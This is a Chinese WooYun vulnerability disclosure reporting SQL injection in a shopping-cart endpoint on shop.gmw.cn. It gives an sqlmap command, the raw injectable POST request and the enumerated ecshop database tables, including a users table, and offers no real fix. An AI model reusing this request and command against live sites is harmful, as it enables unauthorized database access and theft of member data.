当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0204238

漏洞标题:光明网某处SQL注入泄露会员信息

相关厂商:gmw.cn

漏洞作者: 黑色键盘丶

提交时间:2016-05-03 11:22

修复时间:2016-05-09 09:00

公开时间:2016-05-09 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-03: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rT 厂商评分没超过10分的 让我来破处吧

详细说明:

post注入:sqlmap.py -r 1.txt --dbs
---------------------数据包---------------------- 注入参数id
POST /delete_cart_goods.php HTTP/1.1
Host: shop.gmw.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS_ID=df6861b8e51456e4b62eb77981c2acc21162ba5c; ECS[visit_times]=1
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
id=1


数据库

back-end DBMS: MySQL 5.0
available databases [2]:
[*] ecshop
[*] information_schema


表信息

Database: ecshop
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| ecs_stats | 4829513 |
| ecs_users | 60469 |
| ecs_goods_attr | 45934 |
| ecs_keywords | 9852 |
| ecs_goods_gallery | 6632 |
| ecs_goods | 6407 |
| ecs_admin_log | 5005 |
| ecs_ddbook | 3983 |
| ecs_region | 3408 |
| ecs_searchengine | 1638 |
| ecs_order_goods | 1192 |
| ecs_jdhongwenge | 819 |
| ecs_sessions_data | 660 |
| ecs_order_action | 565 |
| ecs_sessions | 468 |
| ecs_pay_log | 377 |
| ecs_order_info | 336 |
| ecs_article | 218 |
| ecs_attribute | 210 |
| ecs_user_address | 201 |
| ecs_shop_config | 177 |
| ecs_delivery_goods | 175 |
| ecs_goods_article | 147 |
| ecs_admin_action | 109 |
| ecs_goods_cat | 92 |
| ecs_adsense | 57 |
| ecs_category | 56 |
| ecs_delivery_order | 56 |
| ecs_account_log | 46 |
| ecs_collect_goods | 40 |
| ecs_template | 38 |
| ecs_ad_position | 33 |
| ecs_ad | 32 |
| ecs_cid_book | 21 |
| ecs_nav | 21 |
| ecs_email_sendlist | 20 |
| ecs_cat_recommend | 17 |
| ecs_article_cat | 14 |
| ecs_mail_templates | 14 |
| ecs_goods_type | 13 |
| ecs_email_list | 11 |
| ecs_exchange_goods | 11 |
| ecs_suppliers | 9 |
| ecs_feedback | 7 |
| ecs_friend_link | 7 |
| ecs_reg_fields | 6 |
| ecs_volume_price | 6 |
| ecs_content_key | 5 |
| ecs_payment | 5 |
| ecs_bonus_type | 4 |
| ecs_comment | 3 |
| ecs_user_rank | 3 |
| ecs_vote_option | 3 |
| ecs_admin_user | 2 |
| ecs_area_region | 2 |
| ecs_shipping | 2 |
| ecs_shipping_area | 2 |
| ecs_user_account | 2 |
| ecs_role | 1 |
| ecs_vote | 1 |
+--------------------+---------+


数据就不跑啦

漏洞证明:

post注入:sqlmap.py -r 1.txt --dbs
---------------------数据包---------------------- 注入参数id
POST /delete_cart_goods.php HTTP/1.1
Host: shop.gmw.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS_ID=df6861b8e51456e4b62eb77981c2acc21162ba5c; ECS[visit_times]=1
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
id=1


数据库

back-end DBMS: MySQL 5.0
available databases [2]:
[*] ecshop
[*] information_schema


表信息

Database: ecshop
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| ecs_stats | 4829513 |
| ecs_users | 60469 |
| ecs_goods_attr | 45934 |
| ecs_keywords | 9852 |
| ecs_goods_gallery | 6632 |
| ecs_goods | 6407 |
| ecs_admin_log | 5005 |
| ecs_ddbook | 3983 |
| ecs_region | 3408 |
| ecs_searchengine | 1638 |
| ecs_order_goods | 1192 |
| ecs_jdhongwenge | 819 |
| ecs_sessions_data | 660 |
| ecs_order_action | 565 |
| ecs_sessions | 468 |
| ecs_pay_log | 377 |
| ecs_order_info | 336 |
| ecs_article | 218 |
| ecs_attribute | 210 |
| ecs_user_address | 201 |
| ecs_shop_config | 177 |
| ecs_delivery_goods | 175 |
| ecs_goods_article | 147 |
| ecs_admin_action | 109 |
| ecs_goods_cat | 92 |
| ecs_adsense | 57 |
| ecs_category | 56 |
| ecs_delivery_order | 56 |
| ecs_account_log | 46 |
| ecs_collect_goods | 40 |
| ecs_template | 38 |
| ecs_ad_position | 33 |
| ecs_ad | 32 |
| ecs_cid_book | 21 |
| ecs_nav | 21 |
| ecs_email_sendlist | 20 |
| ecs_cat_recommend | 17 |
| ecs_article_cat | 14 |
| ecs_mail_templates | 14 |
| ecs_goods_type | 13 |
| ecs_email_list | 11 |
| ecs_exchange_goods | 11 |
| ecs_suppliers | 9 |
| ecs_feedback | 7 |
| ecs_friend_link | 7 |
| ecs_reg_fields | 6 |
| ecs_volume_price | 6 |
| ecs_content_key | 5 |
| ecs_payment | 5 |
| ecs_bonus_type | 4 |
| ecs_comment | 3 |
| ecs_user_rank | 3 |
| ecs_vote_option | 3 |
| ecs_admin_user | 2 |
| ecs_area_region | 2 |
| ecs_shipping | 2 |
| ecs_shipping_area | 2 |
| ecs_user_account | 2 |
| ecs_role | 1 |
| ecs_vote | 1 |
+--------------------+---------+


数据就不跑啦

修复方案:

嘿嘿

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-09 09:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价